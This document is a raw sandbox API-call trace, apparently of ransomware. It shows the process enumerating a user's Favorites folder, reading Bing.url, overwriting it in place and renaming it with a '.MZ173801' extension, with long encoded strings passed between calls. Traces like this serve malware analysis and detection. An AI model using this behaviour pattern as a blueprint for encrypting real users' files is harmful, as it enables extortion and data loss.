| out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.664] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.664] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.664] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.664] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.664] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.664] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.664] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.664] GetLastError () returned 0x12 [0122.664] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.664] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=6, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Favorites") returned 1 [0122.666] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites" (normalized: "c:\\users\\fd1hvy\\favorites")) returned 0x11 [0122.666] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=6, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Favorites") returned 1 [0122.666] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.667] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.667] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43598c8e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43b9f870, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x43b9f870, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0122.667] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.667] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43598c8e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43b9f870, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x43b9f870, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0xd0)) returned 1 [0122.670] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.670] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.670] GetCurrentThreadId () returned 0x1358 [0122.670] GetCurrentThreadId () returned 0x1358 [0122.670] GetCurrentThreadId () returned 0x1358 [0122.670] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.671] GetCurrentThreadId () returned 0x1358 [0122.671] GetCurrentThreadId () returned 0x1358 [0122.671] GetCurrentThreadId () returned 0x1358 [0122.671] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.671] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0122.671] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.671] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xd0 [0122.671] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.671] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xd0, lpOverlapped=0x0) returned 1 [0122.672] CloseHandle (hObject=0x410) returned 1 [0122.672] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.673] WriteFile (in: hFile=0x410, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0xd0, lpOverlapped=0x0) returned 1 [0122.674] CloseHandle (hObject=0x410) returned 1 [0122.674] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url"), lpNewFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url.MZ173801" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url.mz173801")) returned 1 [0122.675] GetCurrentThreadId () returned 0x1358 [0122.675] GetCurrentThreadId () returned 0x1358 [0122.675] GetCurrentThreadId () returned 0x1358 [0122.675] GetCurrentThreadId () returned 0x1358 [0122.675] GetCurrentThreadId () returned 0x1358 [0122.675] GetCurrentThreadId () returned 0x1358 [0122.675] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.675] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.675] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.675] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0122.675] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0122.675] GetLastError () returned 0x12 [0122.675] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.675] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xaa6449ea, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa6449ea, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.675] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.675] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.675] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xaa6449ea, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa6449ea, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.675] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.675] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.675] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43598c8e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43b9f870, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xaa6449ea, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Bing.url.MZ173801", cAlternateFileName="")) returned 1 [0122.676] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.676] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.676] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.676] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0122.676] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.676] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.676] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bcb0 [0122.676] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0122.676] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.676] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0122.676] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.676] 